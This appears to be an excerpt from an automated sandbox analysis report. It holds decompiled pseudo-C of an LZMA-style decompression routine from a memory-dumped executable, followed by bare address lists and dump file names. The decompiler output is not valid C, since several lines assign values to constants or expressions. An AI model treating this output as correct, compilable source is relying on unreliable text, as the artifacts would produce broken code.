							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x004067ef
0x004067f6
0x004067fc
0x00406802
0x00000000
0x00406806
0x00406812
0x00406812
0x00406812
0x0040681b
0x00000000
0x00000000
0x00406821
0x00000000
0x00406828
0x0040682c
0x00000000
0x00000000
0x00406835
0x00406838
0x0040683b
0x0040683d
0x0040683f
0x00000000
0x00000000
0x00406845
0x00406848
0x0040684a
0x0040684b
0x0040684e
0x00406850
0x00406851
0x00406853
0x00406856
0x0040685b
0x00406860
0x00406869
0x0040687c
0x0040687f
0x00406888
0x0040688b
0x004068b3
0x004068b3
0x004068b5
0x004068c3
0x004068c3
0x004068c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b7
0x004068b7
0x004068ba
0x004068ba
0x004068bb
0x004068bb
0x00000000
0x004068b7
0x0040688d
0x00406891
0x00406896
0x00406896
0x0040689f
0x004068a5
0x004068a7
0x004068aa
0x00000000
0x004068b0
0x004068b0
0x00000000
0x004068b0
0x00000000
0x004068cd
0x004068cd
0x004068d1
0x0040717d
0x00000000
0x0040717d
0x004068da
0x004068ea
0x004068ed
0x004068f0
0x004068f0
0x004068f0
0x004068f3
0x004068f3
0x004068f7
0x00000000
0x00000000
0x004068f9
0x004068fc
0x004068ff
0x00406929
0x0040692f
0x00406936
0x00000000
0x00406936
0x00406901
0x00406905
0x00406908
0x0040690d
0x0040690d
0x00406918
0x0040691e
0x00406920
0x00406923
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406968
0x0040696e
0x00406971
0x0040697e
0x00406986
0x00000000
0x00000000
0x0040693d
0x0040693d
0x00406941
0x0040718c
0x00000000
0x0040718c
0x0040694d
0x00406958
0x00406958
0x00406958
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406966
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700c
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407042
0x00407049
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040704b
0x0040704b
0x0040704f
0x004071fe
0x00000000
0x004071fe
0x0040705b
0x00407062
0x0040706a
0x0040706a
0x0040706a
0x0040706d
0x00407070
0x00407070
0x00000000
0x00000000
0x0040698e
0x00406990
0x00406993
0x00406a04
0x00406a07
0x00406a0a
0x00406a11
0x00406a1b
0x00000000
0x00406a1b
0x00406995
0x00406999
0x0040699c
0x0040699e
0x004069a1
0x004069a4
0x004069a6
0x004069a9
0x004069ab
0x004069b0
0x004069b3
0x004069b6
0x004069ba
0x004069c1
0x004069c4
0x004069cb
0x004069cf
0x004069d7
0x004069d7
0x004069d7
0x004069d1
0x004069d1
0x004069d1
0x004069c6
0x004069c6
0x004069c6
0x004069db
0x004069de
0x004069fc
0x004069fe
0x00000000
0x004069fe
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069eb
0x004069eb
0x004069eb
0x004069ee
0x004069f1
0x004069f3
0x004069f4
0x004069f7
0x00000000
0x00000000
0x00406c2d
0x00406c31
0x00406c4f
0x00406c52
0x00406c59
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6a
0x00406c71
0x00406c72
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c7d
0x00406c82
0x00000000
0x00406c82
0x00406c33
0x00406c36
0x00406c39
0x00406c43
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406cbe
0x00406cc1
0x00406cc4
0x00406cce
0x00406c9d
0x00406c9d
0x00406ca0
0x00406ca3
0x00406ca6
0x00406cb3
0x00406cb6
0x00406cb6
0x00000000
0x00000000
0x00406cda
0x00406cde
0x00000000
0x00000000
0x00406ce4
0x00406ce8
0x00000000
0x00000000
0x00406cee
0x00406cf0
0x00406cf4
0x00406cf4
0x00406cf7
0x00406cfb
0x00000000
0x00000000
0x00406d4b
0x00406d4f
0x00406d56
0x00406d59
0x00406d5c
0x00406d66
0x00000000
0x00406d66
0x00406d51
0x00000000
0x00000000
0x00406d72
0x00406d76
0x00406d7d
0x00406d80
0x00406d83
0x00406d78
0x00406d78
0x00406d78
0x00406d86
0x00406d89
0x00406d8c
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d95
0x00406d98
0x00406d9f
0x00406da4
0x00000000
0x00000000
0x00406e32
0x00406e32
0x00406e36
0x004071d4
0x00000000
0x004071d4
0x00406e3c
0x00406e3f
0x00406e42
0x00406e46
0x00406e49
0x00406e4f
0x00406e51
0x00406e51
0x00406e51
0x00406e54
0x00406e57
0x00000000
0x00000000
0x00406a27
0x00406a27
0x00406a2b
0x00407198
0x00000000
0x00407198
0x00406a31
0x00406a34
0x00406a37
0x00406a3b
0x00406a3e
0x00406a44
0x00406a46
0x00406a46
0x00406a46
0x00406a49
0x00406a4c
0x00406a4c
0x00406a4f
0x00406a52
0x00000000
0x00000000
0x00406a58
0x00406a5e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a75
0x00406a78
0x00406a7a
0x00406a80
0x00406a83
0x00406a86
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406aae
0x00406ab1
0x00406ab4
0x00406ab7
0x00406abe
0x00406ac2
0x00406ac4
0x00406ac8
0x00406a94
0x00406a94
0x00406a98
0x00406aa0
0x00406aa5
0x00406aa7
0x00406aa9
0x00406aa9
0x00406acb
0x00406ad2
0x00406ad5
0x00000000
0x00406adb
0x00000000
0x00406adb
0x00000000
0x00406ae0
0x00406ae0
0x00406ae4
0x004071a4
0x00000000
0x004071a4
0x00406aea
0x00406aed
0x00406af0
0x00406af4
0x00406af7
0x00406afd
0x00406aff
0x00406aff
0x00406aff
0x00406b02
0x00406b05
0x00406b05
0x00406b05
0x00406b0b
0x00000000
0x00000000
0x00406b0d
0x00406b10
0x00406b13
0x00406b16
0x00406b19
0x00406b1c
0x00406b1f
0x00406b22
0x00406b25
0x00406b28
0x00406b2b
0x00406b43
0x00406b46
0x00406b49
0x00406b4c
0x00406b4c
0x00406b4f
0x00406b53
0x00406b55
0x00406b2d
0x00406b2d
0x00406b35
0x00406b3a
0x00406b3c
0x00406b3e
0x00406b3e
0x00406b58
0x00406b5f
0x00406b62
0x00000000
0x00406b64
0x00000000
0x00406b64
0x00406b62
0x00406b69
0x00406b69
0x00406b69
0x00406b69
0x00000000
0x00000000
0x00406ba4
0x00406ba4
0x00406ba8
0x004071b0
0x00000000
0x004071b0
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb8
0x00406bbb
0x00406bc1
0x00406bc3
0x00406bc3
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bcf
0x00406b6d
0x00406b6d
0x00406b70
0x00000000
0x00406b70
0x00406bd1
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bef
0x00406c07
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c17
0x00406c19
0x00406bf1
0x00406bf1
0x00406bf9
0x00406bfe
0x00406c00
0x00406c02
0x00406c02
0x00406c1c
0x00406c23
0x00406c26
0x00000000
0x00406c28
0x00000000
0x00406c28
0x00000000
0x00406eb5
0x00406eb5
0x00406eb9
0x004071e0
0x00000000
0x004071e0
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec9
0x00406ecc
0x00406ed2
0x00406ed4
0x00406ed4
0x00406ed4
0x00406ed7
0x00000000
0x00000000
0x00406c85
0x00406c85
0x00406c88
0x00000000
0x00000000
0x00406fc4
0x00406fc8
0x00406fea
0x00406fed
0x00406ff7
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406fca
0x00406fcd
0x00406fd1
0x00406fd4
0x00406fd4
0x00406fd7
0x00000000
0x00000000
0x00407081
0x00407085
0x004070a3
0x004070a3
0x004070a3
0x004070aa
0x004070b1
0x004070b8
0x004070b8
0x00000000
0x004070b8
0x00407087
0x0040708a
0x0040708d
0x00407090
0x00407097
0x00406fdb
0x00406fdb
0x00406fde
0x00000000
0x00000000
0x00407172
0x00407175
0x00000000
0x00000000
0x00406dac
0x00406dae
0x00406db5
0x00406db6
0x00406db8
0x00406dbb
0x00000000
0x00000000
0x00406dc3
0x00406dc6
0x00406dc9
0x00406dcb
0x00406dcd
0x00406dcd
0x00406dce
0x00406dd1
0x00406dd8
0x00406ddb
0x00406de9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c2
0x004070c9
0x00000000
0x00000000
0x004070ce
0x004070ce
0x004070d2
0x0040720a
0x00000000
0x0040720a
0x004070d8
0x004070db
0x004070de
0x004070e2
0x004070e5
0x004070eb
0x004070ed
0x004070ed
0x004070ed
0x004070f0
0x004070f3
0x004070f3
0x004070f3
0x004070f3
0x004070f6
0x004070f6
0x004070fa
0x0040715a
0x0040715d
0x00407162
0x00407163
0x00407165
0x00407167
0x0040716a
0x00407076
0x00407076
0x00000000
0x00407076
0x004070fc
0x00407102
0x00407105
0x00407108
0x0040710b
0x0040710e
0x00407111
0x00407114
0x00407117
0x0040711a
0x0040711d
0x00407136
0x00407139
0x0040713c
0x0040713f
0x00407143
0x00407145
0x00407145
0x00407146
0x00407149
0x0040711f
0x0040711f
0x00407127
0x0040712c
0x0040712e
0x00407131
0x00407131
0x0040714c
0x00407153
0x00000000
0x00407155
0x00000000
0x00407155
0x00000000
0x00406df1
0x00406df4
0x00406e2a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5d
0x00406f5d
0x00406f60
0x00406f62
0x004071ec
0x00000000
0x004071ec
0x00406f68
0x00406f6b
0x00000000
0x00000000
0x00406f71
0x00406f75
0x00406f78
0x00406f78
0x00406f78
0x00000000
0x00406f78
0x00406df6
0x00406df8
0x00406dfa
0x00406dfc
0x00406dff
0x00406e00
0x00406e02
0x00406e04
0x00406e07
0x00406e0a
0x00406e20
0x00406e25
0x00406e5d
0x00406e5d
0x00406e61
0x00406e8d
0x00406e8f
0x00406e96
0x00406e99
0x00406e9c
0x00406e9c
0x00406ea1
0x00406ea1
0x00406ea3
0x00406ea6
0x00406ead
0x00406eb0
0x00406edd
0x00406edd
0x00406ee0
0x00406ee3
0x00406f57
0x00406f57
0x00406f57
0x00000000
0x00406f57
0x00406ee5
0x00406eeb
0x00406eee
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f03
0x00406f06
0x00406f1f
0x00406f21
0x00406f24
0x00406f25
0x00406f28
0x00406f2a
0x00406f2d
0x00406f2f
0x00406f31
0x00406f34
0x00406f36
0x00406f39
0x00406f3d
0x00406f3f
0x00406f3f
0x00406f40
0x00406f43
0x00406f46
0x00406f08
0x00406f08
0x00406f10
0x00406f15
0x00406f17
0x00406f1a
0x00406f1a
0x00406f49
0x00406f50
0x00406eda
0x00406eda
0x00406eda
0x00406eda
0x00000000
0x00406f52
0x00000000
0x00406f52
0x00406f50
0x00406e63
0x00406e66
0x00406e68
0x00406e6b
0x00406e6e
0x00406e71
0x00406e73
0x00406e76
0x00406e79
0x00406e79
0x00406e7c
0x00406e7c
0x00406e7f
0x00406e86
0x00406e5a
0x00406e5a
0x00406e5a
0x00406e5a
0x00000000
0x00406e88
0x00000000
0x00406e88
0x00406e86
0x00406e0c
0x00406e0f
0x00406e11
0x00406e14
0x00000000
0x00000000
0x00406b73
0x00406b73
0x00406b77
0x004071bc
0x00000000
0x004071bc
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8c
0x00406b8f
0x00406b91
0x00406b94
0x00406b97
0x00406b9a
0x00406b9c
0x00406b9c
0x00406b9c
0x00000000
0x00000000
0x00406cfe
0x00406cfe
0x00406d02
0x004071c8
0x00000000
0x004071c8
0x00406d08
0x00406d0b
0x00406d0e
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d26
0x00406d28
0x00406d28
0x00406d28
0x00406d2b
0x00406d2e
0x00406d31
0x00406d34
0x00406d34
0x00406d34
0x00406d37
0x00406d39
0x00406d39
0x00000000
0x00000000
0x00406f7b
0x00406f7b
0x00406f7b
0x00406f7f
0x00000000
0x00000000
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f90
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa2
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb8
0x00406fba
0x00406fbd
0x00000000
0x00406fbf
0x00406d3c
0x00406d3c
0x00000000
0x00406d3c
0x00406fbd
0x004071f2
0x00407214
0x0040721a
0x0040721c
0x00407223
0x00000000
0x00000000
0x00406821
0x00407229
0x00407229
0x00000000

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
